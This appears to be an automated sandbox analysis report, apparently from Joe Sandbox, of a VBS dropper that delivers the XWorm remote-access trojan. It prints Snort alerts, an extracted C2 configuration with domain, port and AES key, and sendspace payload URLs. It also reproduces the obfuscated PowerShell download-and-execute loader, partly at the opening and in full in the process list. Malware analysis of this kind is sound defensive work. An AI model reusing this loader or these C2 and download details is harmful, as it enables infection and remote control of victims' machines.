F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsoSad.eg,nexhrDi.soaSyntamLandbm Flori .ovenQ.estgUnder

              Snort Signatures

              Timestamp:05/23/24-18:27:00.510391
              SID:2852874
              Source Port:8896
              Destination Port:49713
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/23/24-18:27:15.305430
              SID:2852923
              Source Port:49713
              Destination Port:8896
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/23/24-18:26:16.229142
              SID:2855924
              Source Port:49713
              Destination Port:8896
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/23/24-18:27:15.263195
              SID:2852870
              Source Port:8896
              Destination Port:49713
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: xwormmom53.duckdns.orgAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 0000000B.00000002.2686700696.00000000226D1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["xwormmom53.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
              Multi AV Scanner detection for submitted file
              Source: file.vbsReversingLabs: Detection: 28%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.8:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.8:49711 version: TLS 1.2
              Source: Binary string: CallSite.Targetore.pdbj source: powershell.exe, 00000008.00000002.1954692113.00000000077D6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1954692113.0000000007775000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: a`ystem.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.2027958959.0000016CA38B5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1959428838.0000000008919000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000008.00000002.1954692113.0000000007784000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2159560883.0000016CBDA15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1954692113.0000000007775000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2159560883.0000016CBD9F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1954692113.00000000077D6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: anagement.Automation.pdb source: powershell.exe, 00000002.00000002.2155969999.0000016CBD76C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws\System.Core.pdbD source: powershell.exe, 00000002.00000002.2027958959.0000016CA38B5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbRT-P source: powershell.exe, 00000008.00000002.1954692113.0000000007811000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2159560883.0000016CBDA15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1954692113.0000000007775000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.1954692113.0000000007784000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49713 -> 57.128.155.22:8896
              Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 57.128.155.22:8896 -> 192.168.2.8:49713
              Source: TrafficSnort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.8:49713 -> 57.128.155.22:8896
              Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 57.128.155.22:8896 -> 192.168.2.8:49713
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: xwormmom53.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: xwormmom53.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.8:49713 -> 57.128.155.22:8896
              Source: global trafficHTTP traffic detected: GET /pro/dl/ppxodm HTTP/1.1Host: www.sendspace.com
              Source: global trafficHTTP traffic detected: GET /dlpro/ab0d4132c177b6677608eb6f24e68e83/664f6df0/ppxodm/Turde.jpb HTTP/1.1Host: fs03n5.sendspace.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 57.128.155.22 57.128.155.22
              Source: Joe Sandbox ViewIP Address: 69.31.136.17 69.31.136.17
              Source: Joe Sandbox ViewIP Address: 69.31.136.57 69.31.136.57
              Source: Joe Sandbox ViewASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /pro/dl/ppxodm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/8gikly HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n3.sendspace.comConnection: Keep-AliveCookie: SID=7cbl3ctvlcko76s2guour4vig6
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /pro/dl/ppxodm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/ppxodm HTTP/1.1Host: www.sendspace.com
              Source: global trafficHTTP traffic detected: GET /dlpro/ab0d4132c177b6677608eb6f24e68e83/664f6df0/ppxodm/Turde.jpb HTTP/1.1Host: fs03n5.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/8gikly HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n3.sendspace.comConnection: Keep-AliveCookie: SID=7cbl3ctvlcko76s2guour4vig6
              Source: global trafficDNS traffic detected: DNS query: www.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs03n3.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs03n5.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs13n3.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: xwormmom53.duckdns.org
              Source: powershell.exe, 00000008.00000002.1954692113.00000000077D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA75A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fs03n3.sendspace.com
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5A1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fs03n5.sendspace.com
              Source: powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1946860119.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2686700696.00000000226D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA58BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA7569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sendspace.com
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000008.00000002.1946860119.0000000004E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA758D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspaX
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA758D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspace.com
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA7569000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA7589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA758D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA5893000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n3.sendspace.com/dlpro/4b26f029f512f90f3568c85b6d26623d/664f6de9/ppxodm/Turde.jpb
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5A1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n5.sendspace.com
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA58BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA5A1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n5.sendspace.com/dlpro/ab0d4132c177b6677608eb6f24e68e83/664f6df0/ppxodm/Turde.jpb
              Source: wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n3.sendspace.com/
              Source: wab.exe, 0000000B.00000003.1945545305.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2672655270.0000000006DFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n3.sendspace.com/Di
              Source: wab.exe, 0000000B.00000003.1945545305.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n3.sendspace.com/_i
              Source: wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n3.sendspace.com/c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.bin
              Source: wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n3.sendspace.com/dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC1
              Source: wab.exe, 0000000B.00000003.1945545305.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n3.sendspace.com/eh
              Source: wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n3.sendspace.com/om:443
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA60F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA74FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA58BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2030954213.0000016CA5781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
              Source: wab.exe, 0000000B.00000002.2672655270.0000000006DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/
              Source: wab.exe, 0000000B.00000002.2672655270.0000000006DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/FW
              Source: wab.exe, 0000000B.00000002.2672655270.0000000006DE3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2672384131.0000000006CE0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.1931143615.0000000006E14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/8gikly
              Source: wab.exe, 0000000B.00000002.2672655270.0000000006DE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/8giklyM
              Source: powershell.exe, 00000002.00000002.2030954213.0000016CA5597000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/ppxodmP
              Source: powershell.exe, 00000008.00000002.1946860119.0000000004FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/ppxodmXR
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.8:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.8:49711 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_7772.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_5824.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 5824, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7248
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7248
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7248Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7248Jump to behavior
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B1DC8562_2_00007FFB4B1DC856
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B1DD6022_2_00007FFB4B1DD602
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B1D4CFA2_2_00007FFB4B1D4CFA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_2255D90811_2_2255D908
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_22550EC011_2_22550EC0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_2255D50411_2_2255D504
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24F6623011_2_24F66230
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24F6119811_2_24F61198
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24F6527011_2_24F65270
              Source: file.vbsInitial sample: Strings found which are bigger than 50
